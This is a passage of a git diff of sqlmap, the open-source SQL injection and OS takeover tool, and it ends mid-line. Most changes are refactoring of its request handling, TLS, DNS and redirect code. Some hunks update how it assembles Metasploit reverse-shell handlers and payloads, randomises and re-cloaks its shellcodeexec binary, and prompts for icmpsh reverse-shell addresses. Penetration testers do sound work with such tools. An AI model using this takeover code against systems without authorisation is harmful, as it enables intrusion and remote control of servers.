kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) finally: kb.pageCompress = popValue() @@ -1057,13 +1202,15 @@ class Connect(object): warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " - warnMsg += "behavior in custom WAF/IDS/IPS solutions" + warnMsg += "behavior in custom WAF/IPS/IDS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) + threadData.lastPage = page + threadData.lastCode = code kb.originalCode = kb.originalCode or code @@ -1073,7 +1220,8 @@ class Connect(object): if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: - kb.responseTimes.append(threadData.lastQueryDuration) + kb.responseTimes.setdefault(kb.responseTimeMode, []) + kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) @@ -1082,12 +1230,12 @@ class Connect(object): kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: - return page, headers + return page, headers, code if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) else: return comparison(page, headers, code, getRatioValue, pageLength) -def setHTTPProxy(): # Cross-linked function +def setHTTPHandlers(): # Cross-linked function raise NotImplementedError diff --git a/lib/request/direct.py b/lib/request/direct.py index 937d6c5a4..0490c6207 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -24,6 +24,7 @@ from lib.core.dicts import SQL_STATEMENTS from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import TIMEOUT_STATE from lib.core.settings import UNICODE_ENCODING from lib.utils.timeout import timeout @@ -51,13 +52,18 @@ def direct(query, content=True): start = time.time() if not select and "EXEC " not in query.upper(): - _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) + timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): - output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) - hashDBWrite(query, output, True) + output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) + if state == TIMEOUT_STATE.NORMAL: + hashDBWrite(query, output, True) + elif state == TIMEOUT_STATE.TIMEOUT: + conf.dbmsConnector.close() + conf.dbmsConnector.connect() elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) + threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: diff --git a/lib/request/dns.py b/lib/request/dns.py index 8f10a605a..a03ada19c 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -59,14 +59,31 @@ class DNSQuery(object): class DNSServer(object): def __init__(self): + self._check_localhost() self._requests = [] self._lock = threading.Lock() - self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + try: + self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM) + except AttributeError: + self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._socket.bind(("", 53)) self._running = False self._initialized = False + def _check_localhost(self): + response = "" + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(("", 53)) + s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex")) # A www.google.com + response = s.recv(512) + except: + pass + finally: + if response and "google" in response: + raise socket.error("another DNS service already running on *:53") + def pop(self, prefix=None, suffix=None): """ Returns received DNS resolution request (if any) that has given diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 6906f4686..5f1eb2cde 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -1,17 +1,21 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import distutils.version import httplib +import re import socket import urllib2 +from lib.core.common import getSafeExString from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException +from lib.core.settings import PYVERSION ssl = None try: @@ -42,7 +46,30 @@ class HTTPSConnection(httplib.HTTPSConnection): success = False - if not kb.tlsSNI: + # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext + # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni + if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): + for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): + try: + sock = create_sock() + context = ssl.SSLContext(protocol) + _ = context.wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host) + if _: + success = True + self.sock = _ + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: + self._tunnel_host = None + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) + + if kb.tlsSNI.get(self.host) is None: + kb.tlsSNI[self.host] = success + + if not success: for protocol in _protocols: try: sock = create_sock() @@ -55,32 +82,16 @@ class HTTPSConnection(httplib.HTTPSConnection): break else: sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: + except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) - - # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext - # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if not success and hasattr(ssl, "SSLContext"): - for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): - try: - sock = create_sock() - context = ssl.SSLContext(protocol) - _ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host) - if _: - kb.tlsSNI = success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg: - self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % errMsg) + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) if not success: - raise SqlmapConnectionException("can't establish SSL connection") + errMsg = "can't establish SSL connection" + # Reference: https://docs.python.org/2/library/ssl.html + if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.9"): + errMsg += " (please retry with Python >= 2.7.9)" + raise SqlmapConnectionException(errMsg) class HTTPSHandler(urllib2.HTTPSHandler): def https_open(self, req): diff --git a/lib/request/inject.py b/lib/request/inject.py index b12517ce4..c51cdb735 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -39,6 +39,7 @@ from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import MAX_TECHNIQUES_PER_VALUE @@ -56,7 +57,7 @@ from lib.techniques.union.use import unionUse def _goDns(payload, expression): value = None - if conf.dnsName and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: + if conf.dnsDomain and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: if kb.dnsTest is None: dnsTest(payload) @@ -78,7 +79,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: + if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not conf.forceThreads): if field and re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): expression = "SELECT %s FROM (%s)" % (field, expression) @@ -189,7 +190,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) - if " ORDER BY " in expression.upper(): + if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] @@ -207,22 +208,22 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" - test = readInput(message, default="a") + choice = readInput(message, default='A').upper() - if not test or test[0] in ("a", "A"): + if choice == 'A': stopLimit = count - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException - elif test.isdigit() and int(test) > 0 and int(test) <= count: - stopLimit = int(test) + elif choice.isdigit() and int(choice) > 0 and int(choice) <= count: + stopLimit = int(choice) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) - elif test[0] in ("#", "s", "S"): + elif choice in ('#', 'S'): message = "how many? " stopLimit = readInput(message, default="10") @@ -262,9 +263,14 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) + try: + for num in xrange(startLimit, stopLimit): + output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + outputs.append(output) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) except KeyboardInterrupt: print @@ -278,7 +284,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None + return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None def _goBooleanProxy(expression): """ @@ -287,7 +293,7 @@ def _goBooleanProxy(expression): initTechnique(kb.technique) - if conf.dnsName: + if conf.dnsDomain: query = agent.prefixQuery(kb.injection.data[kb.technique].vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) @@ -358,7 +364,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser if conf.direct: value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) - elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): + elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)): query = cleanQuery(expression) query = expandAsteriskForColumns(query) value = None @@ -407,7 +413,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - if found and conf.dnsName: + if found and conf.dnsDomain: _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) warnMsg = "option '--dns-domain' will be ignored " warnMsg += "as faster techniques are usable " @@ -426,6 +432,8 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: + kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", re.sub(r"(?i)(\w+)\(.+\)", r"\g<1>", expression))) if re.search(r"(?i)SELECT.+FROM", expression) else None + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): kb.technique = PAYLOAD.TECHNIQUE.TIME else: @@ -435,7 +443,6 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - else: errMsg = "none of the injection types identified can be " errMsg += "leveraged to retrieve queries output" @@ -443,6 +450,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser finally: kb.resumeValues = True + kb.responseTimeMode = None conf.tbl = popValue() conf.db = popValue() diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py index 5fd203561..68e1f22a8 100644 --- a/lib/request/methodrequest.py +++ b/lib/request/methodrequest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index ea3aa7aad..50b93b276 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,12 +11,13 @@ import urllib2 from lib.core.data import conf class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): - def __init__(self, key_file): + def __init__(self, auth_file): urllib2.HTTPSHandler.__init__(self) - self.key_file = key_file + self.auth_file = auth_file def https_open(self, req): return self.do_open(self.getConnection, req) def getConnection(self, host, timeout=None): - return httplib.HTTPSConnection(host, key_file=self.key_file, timeout=conf.timeout) + # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain + return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 8288be55e..4eb802d37 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 73fa73f19..a6e560bcf 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import re import types import urllib2 import urlparse @@ -30,6 +31,7 @@ from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage +from lib.request.basic import parseResponse class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def _get_header_redirect(self, headers): @@ -37,9 +39,9 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): if headers: if "location" in headers: - retVal = headers.getheaders("location")[0].split("?")[0] + retVal = headers.getheaders("location")[0] elif "uri" in headers: - retVal = headers.getheaders("uri")[0].split("?")[0] + retVal = headers.getheaders("uri")[0] return retVal @@ -48,18 +50,16 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): if kb.redirectChoice is None: msg = "sqlmap got a %d redirect to " % redcode msg += "'%s'. Do you want to follow? [Y/n] " % redurl - choice = readInput(msg, default="Y") - kb.redirectChoice = choice.upper() + kb.redirectChoice = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: msg = "redirect is a result of a " msg += "POST request. Do you want to " msg += "resend original POST data to a new " msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N") - choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) - kb.resendPostOnRedirect = choice.upper() == 'Y' + kb.resendPostOnRedirect = readInput(msg, default=('Y' if not kb.originalPage else 'N'), boolean=True) if kb.resendPostOnRedirect: self.redirect_request = self._redirect_request @@ -70,7 +70,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, headers): content = None - redurl = self._get_header_redirect(headers) + redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None try: content = fp.read(MAX_CONNECTION_TOTAL_SIZE) @@ -118,9 +118,16 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): result = fp if redurl and kb.redirectChoice == REDIRECTION.YES: + parseResponse(content, headers) + req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) if headers and HTTP_HEADER.SET_COOKIE in headers: - req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] + delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER + _ = headers[HTTP_HEADER.SET_COOKIE].split(delimiter)[0] + if HTTP_HEADER.COOKIE not in req.headers: + req.headers[HTTP_HEADER.COOKIE] = _ + else: + req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (_.split('=')[0], delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter)) try: result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) except urllib2.HTTPError, e: diff --git a/lib/request/templates.py b/lib/request/templates.py index b95173ff9..0fb74f966 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -13,7 +13,7 @@ def getPageTemplate(payload, place): if payload and place: if (payload, place) not in kb.pageTemplates: - page, _ = Request.queryPage(payload, place, content=True, raise404=False) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) retVal = kb.pageTemplates[(payload, place)] diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/takeover/__init__.py +++ b/lib/takeover/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 20ff60fc5..f5ef9edaf 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -25,13 +25,13 @@ from lib.core.shell import autoCompletion from lib.request import inject from lib.takeover.udf import UDF from lib.takeover.web import Web -from lib.takeover.xp_cmdshell import Xp_cmdshell +from lib.takeover.xp_cmdshell import XP_cmdshell -class Abstraction(Web, UDF, Xp_cmdshell): +class Abstraction(Web, UDF, XP_cmdshell): """ This class defines an abstraction layer for OS takeover functionalities - to UDF / Xp_cmdshell objects + to UDF / XP_cmdshell objects """ def __init__(self): @@ -40,7 +40,7 @@ class Abstraction(Web, UDF, Xp_cmdshell): UDF.__init__(self) Web.__init__(self) - Xp_cmdshell.__init__(self) + XP_cmdshell.__init__(self) def execCmd(self, cmd, silent=False): if self.webBackdoorUrl and not isStackingAvailable(): @@ -75,17 +75,17 @@ class Abstraction(Web, UDF, Xp_cmdshell): return safechardecode(retVal) def runCmd(self, cmd): - getOutput = None + choice = None if not self.alwaysRetrieveCmdOutput: message = "do you want to retrieve the command standard " message += "output? [Y/n/a] " - getOutput = readInput(message, default="Y") + choice = readInput(message, default='Y') - if getOutput in ("a", "A"): + if choice in ('a', 'A'): self.alwaysRetrieveCmdOutput = True - if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput: + if not choice or choice in ('y', 'Y') or self.alwaysRetrieveCmdOutput: output = self.evalCmd(cmd) if output: @@ -166,9 +166,8 @@ class Abstraction(Web, UDF, Xp_cmdshell): msg += "statements as another DBMS user since you provided the " msg += "option '--dbms-creds'. If you are DBA, you can enable it. " msg += "Do you want to enable it? [Y/n] " - choice = readInput(msg, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") inject.goStacked(expression) diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 35cfe9881..3df18cf55 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -1,11 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os +import re +import socket import time from extra.icmpsh.icmpsh_m import main as icmpshmaster @@ -18,6 +20,7 @@ from lib.core.common import readInput from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.exception import SqlmapDataException class ICMPsh: """ @@ -32,18 +35,50 @@ class ICMPsh: self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_")) def _selectRhost(self): - message = "what is the back-end DBMS address? [%s] " % self.remoteIP - address = readInput(message, default=self.remoteIP) + address = None + message = "what is the back-end DBMS address? " + + if self.remoteIP: + message += "[Enter for '%s' (detected)] " % self.remoteIP + + while not address: + address = readInput(message, default=self.remoteIP) + + if conf.batch and not address: + raise SqlmapDataException("remote host address is missing") return address def _selectLhost(self): - message = "what is the local address? [%s] " % self.localIP - address = readInput(message, default=self.localIP) + address = None + message = "what is the local address? " + + if self.localIP: + message += "[Enter for '%s' (detected)] " % self.localIP + + valid = None + while not valid: + valid = True + address = readInput(message, default=self.localIP or "") + + try: + socket.inet_aton(address) + except socket.error: + valid = False + finally: + valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None + + if conf.batch and not address: + raise SqlmapDataException("local host address is missing") + elif address and not valid: + warnMsg = "invalid local host address" + logger.warn(warnMsg) return address def _prepareIngredients(self, encode=True): + self.localIP = getattr(self, "localIP", None) + self.remoteIP = getattr(self, "remoteIP", None) self.lhostStr = ICMPsh._selectLhost(self) self.rhostStr = ICMPsh._selectRhost(self) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 8717b6c73..fcfe16100 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -1,17 +1,21 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re +import select import sys +import tempfile import time from subprocess import PIPE +from extra.cloak.cloak import cloak +from extra.cloak.cloak import decloak from lib.core.common import dataToStdout from lib.core.common import Backend from lib.core.common import getLocalIP @@ -34,6 +38,7 @@ from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.settings import IS_WIN from lib.core.settings import METASPLOIT_SESSION_TIMEOUT +from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER from lib.core.settings import UNICODE_ENCODING from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD @@ -43,8 +48,6 @@ from lib.core.subprocessng import recv_some if IS_WIN: import msvcrt -else: - from select import select class Metasploit: """ @@ -288,7 +291,7 @@ class Metasploit: def _selectRhost(self): if self.connectionStr.startswith("bind"): - message = "what is the back-end DBMS address? [%s] " % self.remoteIP + message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP address = readInput(message, default=self.remoteIP) if not address: @@ -304,7 +307,7 @@ class Metasploit: def _selectLhost(self): if self.connectionStr.startswith("reverse"): - message = "what is the local address? [%s] " % self.localIP + message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP address = readInput(message, default=self.localIP) if not address: @@ -348,7 +351,7 @@ class Metasploit: self._cliCmd += " E" else: - self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd = "%s -L -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) self._cliCmd += "; set EXITFUNC %s" % exitfunc self._cliCmd += "; set LPORT %s" % self.portStr @@ -426,10 +429,12 @@ class Metasploit: self._payloadCmd += " X > \"%s\"" % outFile else: if extra == "BufferRegister=EAX": - self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile) + self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format) if extra is not None: self._payloadCmd += " %s" % extra + + self._payloadCmd += " > \"%s\"" % outFile else: self._payloadCmd += " -f exe > \"%s\"" % outFile @@ -546,7 +551,7 @@ class Metasploit: # Probably the child has exited pass else: - ready_fds = select([stdin_fd], [], [], 1) + ready_fds = select.select([stdin_fd], [], [], 1) if stdin_fd in ready_fds[0]: try: @@ -594,8 +599,10 @@ class Metasploit: else: proc.kill() - except (EOFError, IOError): + except (EOFError, IOError, select.error): return proc.returncode + except KeyboardInterrupt: + pass def createMsfShellcode(self, exitfunc, format, extra, encode): infoMsg = "creating Metasploit Framework multi-stage shellcode " @@ -615,7 +622,7 @@ class Metasploit: pollProcess(process) payloadStderr = process.communicate()[1] - match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr) + match = re.search("(Total size:|Length:|succeeded with size|Final size of exe file:) ([\d]+)", payloadStderr) if match: payloadSize = int(match.group(2)) @@ -640,6 +647,14 @@ class Metasploit: if Backend.isOs(OS.WINDOWS): self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") + content = decloak(self.shellcodeexecLocal) + if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: + content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))) + _ = cloak(data=content) + handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") + os.close(handle) + with open(self.shellcodeexecLocal, "w+b") as f: + f.write(_) else: self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index fbeff3490..6a5a2f39d 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index aa10b3c63..b57d2c81e 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -42,12 +42,8 @@ class UDF: def _askOverwriteUdf(self, udf): message = "UDF '%s' already exists, do you " % udf message += "want to overwrite it? [y/N] " - output = readInput(message, default="N") - if output and output[0] in ("y", "Y"): - return True - else: - return False + return readInput(message, default='N', boolean=True) def _checkExistUdf(self, udf): logger.info("checking if UDF '%s' already exist" % udf) @@ -158,9 +154,8 @@ class UDF: message = "do you want to proceed anyway? Beware that the " message += "operating system takeover will fail [y/N] " - choice = readInput(message, default="N") - if choice and choice.lower() == "y": + if readInput(message, default='N', boolean=True): written = True else: return False @@ -241,9 +236,9 @@ class UDF: msg += "from the shared library? " while True: - udfCount = readInput(msg, default=1) + udfCount = readInput(msg, default='1') - if isinstance(udfCount, 